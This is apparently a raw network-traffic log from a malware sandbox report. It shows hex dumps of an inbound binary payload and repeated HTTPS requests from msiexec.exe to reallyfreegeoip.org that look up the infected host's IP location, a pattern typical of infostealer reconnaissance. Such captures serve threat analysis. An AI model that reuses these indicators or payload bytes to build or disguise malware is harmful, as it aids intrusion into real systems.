2024-12-17 12:36:11 UTC	1390	IN	Data Raw: b9 a0 f5 f7 7f a3 24 5b 41 e7 5d aa bb d4 8e 43 17 fd cb 40 46 8a 20 45 6c eb 52 1f e9 50 04 48 b0 02 49 35 bd 02 a9 4b 2b 6c 0f 18 91 91 1f bc 45 dc 1d 64 47 cf 6d e6 b0 84 45 62 b4 70 f4 16 1b 79 bc 6e 6d 6f 84 82 10 93 2c 51 44 42 a2 f5 55 a3 3c 8e 17 65 dc 28 64 6e 3f c1 7a 30 7d 3d 64 f0 91 29 90 72 bf 59 65 7f ea 6a 66 b1 3c 91 00 3d be b9 6a 74 5d 96 42 9b 02 22 3a f4 8d 94 c7 38 ac 0d 32 6b 0f c5 ab 11 ef 54 58 f2 46 d6 3d 3f 3c 54 98 7d 29 a6 71 93 ae df 6b c8 6a fb ab b9 b8 02 0a d4 56 81 81 4d 3f 9b 9f 71 24 8f ea 2b ae 1e a9 c2 4e 97 8a 32 af 97 1b a6 50 8b c3 d0 1d 68 2b 55 c2 ac bf ac 3d ee 1f c3 df 26 2e 4f dd 3d 32 7f db c6 fa 8e c0 1f 82 56 19 09 40 1a 9f 87 40 19 bd fd db c7 11 14 71 02 2c bd ac ca 2b f4 29 c0 a4 cb 2b 2a 46 75 4d 58 da Data Ascii: $[A]C@F ElRPHI5K+lEdGmEbpynmo,QDBU<e(dn?z0}=d)rYejf<=jt]B":82kTXF=?<T})qkjVM?q$+N2Ph+U=&.O=2V@@q,+)+*FuMX
2024-12-17 12:36:11 UTC	1390	IN	Data Raw: 78 7c 0a 4d 99 12 2c e2 86 91 b0 20 29 63 17 16 5b fa f1 26 a1 f2 83 20 a6 be cc 7b cc 37 4c f9 1a b1 b7 ba 50 86 66 a4 b7 15 15 1b e6 2e 6c ce 9e c5 15 e9 ae 84 7c c8 4a 47 37 3c 8b b1 22 fe 3e 7b c3 a0 7f 26 88 b1 6f 00 d8 bc f7 4b e9 37 95 f1 2a 12 c9 0e c3 4d de 25 ff bf 1a 6e 0b 05 f9 bb 6a fe 78 a8 a4 29 ce 65 d1 73 25 af 97 ff 85 d2 95 02 03 67 eb e2 e4 50 f8 ff 5c 92 98 fa 3c c7 da b7 48 b0 76 d8 10 a5 74 16 3c 29 1c dd 2b a0 38 ab bc 4f c0 41 40 56 ba fb d3 b1 f4 e7 5e 11 25 f4 1c b8 79 e4 6e 6d 6f e5 11 6d 86 49 46 b9 3f bd f5 54 82 02 b9 53 65 d6 5e 4f 78 3f b1 54 1d c4 3d 62 eb fd 5b 90 5a 8b 71 3e 79 ea bd 99 fb 3c 91 21 3d c0 b9 6a 74 30 96 42 b3 64 0a 70 fe 53 9e 65 2c b8 19 64 e5 0f c5 a5 17 0f 56 58 83 5c fe b4 4d f7 51 8e f3 47 0e 51 82 Data Ascii: x\|M, )c[& {7LPf.l\|JG7<">{&oK7*M%njx)es%gP\<Hvt<)+8OA@V^%ynmomIF?TSe^Ox?T=b[Zq>y<!=jt0BdpSe,dVX\MQGQ
2024-12-17 12:36:11 UTC	1390	IN	Data Raw: 22 b2 73 bc a2 0b 28 7a d1 5d 7f 7f 8f e4 57 11 84 99 a5 49 85 d9 78 0a 77 c8 f4 81 35 3c e2 7b 53 b2 c9 7e 4d dd 0c e3 f9 0c f3 d8 98 c1 9c c1 d4 0f 63 84 b2 8d 09 31 da 8b a7 5c ee 9b 83 22 68 1f ad c9 f1 60 cd 6b ad c2 c5 96 bf 23 6b 1f b4 c4 e1 f9 22 07 6a 5e 2d df 95 d1 ab 5d 1a 1b 87 46 6f b8 33 3e 7c 0a 41 f9 cf 3d fe e3 12 71 20 23 69 06 7f f6 50 f1 2c b8 f5 83 3c b7 5f cc 7b c2 44 8f c1 d9 bb d8 7e 50 86 7a 8c d0 12 7a d4 e6 0e 66 bc a3 c5 3d 9a c1 42 76 c8 5c ca 66 3b f9 65 08 e8 3c 5b 7c a0 0f 04 bb 5a 60 06 0a b1 bb 35 ac 3d fa 32 88 37 db 7c f5 5b c3 d8 97 ff 1a 6f 28 b1 ae d5 01 b8 08 0a 85 9c c3 cb a3 20 3e 0d c2 45 d2 00 80 8f 33 c5 ce fa bf 7e 8a 2a 57 30 cd 42 6b fb f1 03 38 12 59 61 4b 9d 06 db 2c 8b 49 63 7c 3a 05 1f cc ed e2 96 65 4c Data Ascii: "s(z]WIxw5<{S~Mc1\"h`k#k"j^-]Fo3>\|A=q #iP,<_{D~Pzzf=Bv\f;e<[\|Z`5=27\|[o( >E3~*W0Bk8YaK,Ic\|:eL
2024-12-17 12:36:11 UTC	1390	IN	Data Raw: a0 22 ab 57 97 1c 0c 89 eb 1c b0 cc 03 50 50 8d 63 57 77 09 1d 83 8e ec b5 0b f7 f6 83 d7 60 ff a9 ee be 2d ba 1b 3a 49 2c 05 49 18 d0 37 9e d8 b8 24 a7 3b ae d2 ab 63 54 90 c7 86 77 97 29 01 33 f5 fa 6c 5d 85 c6 fd a9 ba 13 f4 2e 89 df 3e 61 5c f9 3a b7 66 62 d5 96 e0 2a bc 9f 51 c1 94 ed d6 7c f3 2f 22 90 04 62 ae 01 21 56 a8 6b 10 7e 8b f5 7f 63 ed 51 b6 1c d3 f2 78 0a 79 f3 b9 81 1d 54 f3 58 27 2f aa 78 49 f5 32 e3 f9 74 c1 06 88 e0 c6 96 d6 0f 19 81 be 0c 21 53 d0 9d 53 83 fd 9e 92 27 2f e2 af c9 f5 6c 81 69 ad b6 a1 8f 3c 23 1b 03 8a bb e0 ea 0d 00 b1 73 62 c4 09 97 92 6d 1a 3e 91 34 0c 53 35 73 de 2f 50 a2 bb 3d fe e3 98 95 38 51 aa 08 0c 44 f2 d4 3f d5 ca 92 3b cd c7 e9 61 b4 1c 4f c1 a9 13 92 a1 2e a6 70 8c c5 b7 30 0d 94 8d 79 c2 ee 67 15 eb ae Data Ascii: "WPPcWw`-:I,I7$;cTw)3l].>a\:fb*Q\|/"b!Vk~cQxyTX'/xI2t!SS'/li<#sbm>4S5s/P=8QD?;aO.p0yg
2024-12-17 12:36:11 UTC	1390	IN	Data Raw: 52 76 d6 4c c1 18 4a 5d 3c 64 41 18 14 75 4d a6 19 aa cc 7b f1 79 6a 1e c2 9b 41 3d 43 29 d9 28 26 6c 8e c5 85 2e c0 20 be 16 20 bd be 82 44 fa 18 e1 ab 98 81 63 07 ee f1 e2 06 dc e0 ca 8e b0 bf 62 cf 6c b1 24 f0 2a 15 1b c8 89 09 e2 77 72 64 4d f4 69 b0 04 6d 22 ae 53 cd b1 29 b2 7c 1b f9 70 0e 2d f2 02 0d a2 36 bc 37 6e f9 49 33 75 b2 23 50 50 89 c1 0c 5e 7b 9e 92 fc ff 15 23 f2 e0 ab 5c 0f a3 a3 f8 4a 3f 8b 14 a6 1d 15 fe 49 3d c6 58 86 8e b8 54 04 3b af 88 68 76 54 ea c7 86 78 cd 54 0f 33 8f fa 6c 5c 89 37 f3 a9 ce 13 f4 2d 85 cc 3d 61 28 f9 37 d8 14 49 dc 85 b3 9e b1 f2 2f e1 9e ed f2 de da 33 50 3b 66 62 de a9 09 23 d6 54 1a 6d 9a 9a 6b 11 58 43 c4 01 bd ed 08 1c 55 5a f0 81 17 48 1c 7a 4a 79 bb 6e 74 0b 0c e3 f9 64 e9 ae 98 c5 e4 a2 f6 0f 1f 92 9a Data Ascii: RvLJ]<dAuM{yjA=C)(&l. Dcbl$*wrdMim"S)\|p-67nI3u#PP^{#\J?I=XT;hvTxT3l\7-=a(7I/3P;fb#TmkXCUZHzJyntd

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49845	172.67.177.134	443	6220	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 12:36:16 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-17 12:36:16 UTC	880	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 12:36:16 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 427745 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0bss%2FOvjjL9cDNa1lW8UdO%2BEA5hT0e9BvfBaf9A31IU3xQ%2F2Ccx8YdudjzIwr%2BJEIpK6Mq3j198HlsR4r4iAzLhBgpN4Eiy%2Bo5fb9CN4waAnGnoPO9LwcnMlHYvirTxbTozMmZKp"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f36f5339b3742c6-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1869&min_rtt=1803&rtt_var=723&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1619523&cwnd=149&unsent_bytes=0&cid=c58010be60f6c821&ts=455&x=0"
2024-12-17 12:36:16 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49851	172.67.177.134	443	6220	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 12:36:18 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2024-12-17 12:36:18 UTC	884	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 12:36:18 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 427747 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nzRCFOa5iMXmudFd%2BiucT%2BgOJFuTaUT4Of4SYHUM5co%2BNuS31YH%2BGA0m8WTBTJcv6sqaU12hz6Izs9aeI2n4etfnLnn1tKJY0GoX17%2FjiYU9vAO9LiFn95d1oAiPwwD6%2F85%2Bop0b"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f36f540bc5e7cff-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1949&min_rtt=1944&rtt_var=739&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1471774&cwnd=222&unsent_bytes=0&cid=5536438584f4ee96&ts=460&x=0"
2024-12-17 12:36:18 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49858	172.67.177.134	443	6220	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 12:36:21 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-17 12:36:21 UTC	882	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 12:36:21 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 427750 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gBeSzUYHvTT23lUuYch3oXRjC9bMLADN7jyPlzT1w%2B3mUuiacnkY7H4RNRwjwZO0ptr4xc2a%2FSxT88%2FDvr3bqM1JM6iK31JrDBvbcHJcVxjW9LzT8pbzfyVQkt%2FLkr6nd2iC%2Fp%2B1"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f36f5542dd180d3-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1524&min_rtt=1515&rtt_var=586&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1837633&cwnd=230&unsent_bytes=0&cid=965d3802b14b0ce0&ts=456&x=0"
2024-12-17 12:36:21 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49870	172.67.177.134	443	6220	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 12:36:24 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-17 12:36:25 UTC	878	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 12:36:24 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 427753 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UozqYCmhm25viqpuQaruklDMaBYsvYXPtXIoU4fPv%2FxKGomGmE8CDuk%2BYdE0PN3RGbXUQTzuNPTH6zRpvADC82xxGY5tyf3Qq%2FTiNsrD3HD4jCGsNU2jRlZMWRz%2F8A4BTR409rtB"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f36f567784fc3ff-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1485&min_rtt=1463&rtt_var=593&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1778319&cwnd=246&unsent_bytes=0&cid=3ea85d75d9aecaf3&ts=453&x=0"
2024-12-17 12:36:25 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49877	172.67.177.134	443	6220	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 12:36:27 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-17 12:36:28 UTC	879	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 12:36:28 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 427757 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SVgzXSWtfKNUMa9VpdkrjARz%2Bl2KAiIjPdtGODLCTnKAOpQI5ZAtO1T04l%2BE5WV%2B9mbCQ0SlA9JsfjAU6%2F%2Bp0bB0uLDP78ZpFtn6XHpmsbGoPcwyjU6GrSfbH5JahhxPYdgizmpE"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f36f57bba2842fe-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1583&min_rtt=1576&rtt_var=605&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1788120&cwnd=69&unsent_bytes=0&cid=f798f5caeb9215b1&ts=463&x=0"
2024-12-17 12:36:28 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49889	172.67.177.134	443	6220	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 12:36:30 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2024-12-17 12:36:31 UTC	880	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 12:36:31 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 427760 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7X7yrF8jJ%2Boh4KdkRXoicMM6QRZqQowVhMVyKgYJ8lPuDcYM3e9uPR%2B01b3z49V%2FPAPnYfT1%2FBedOYzSPzU8o7YUBqqFfIKqyuS%2F0z7rpZRV6EA4RSWyb1XcMO6HhgVoqqQogd6G"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f36f58f7a4b8c6b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1856&min_rtt=1844&rtt_var=716&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1501285&cwnd=144&unsent_bytes=0&cid=b1096b21c721946d&ts=455&x=0"
2024-12-17 12:36:31 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49896	172.67.177.134	443	6220	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 12:36:34 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-17 12:36:34 UTC	878	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 12:36:34 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 427763 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fCYQZVB8BVRNfqh%2BNvxoBVDoQm6JlEASPdc7QkKmzj8%2FK6AfQRCLhxInKsDTDwW95VcGjwLf91mZwUXsXI72GZAR8FVQnAI%2BdlwGElwvv5TMjlRMtj8B3kFp%2FUJagEXhFBP9Uk2K"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f36f5a2ddbd8c90-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1835&min_rtt=1827&rtt_var=701&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=1543340&cwnd=201&unsent_bytes=0&cid=f585ab36eaffac4b&ts=456&x=0"
2024-12-17 12:36:34 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49903	172.67.177.134	443	6220	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 12:36:37 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
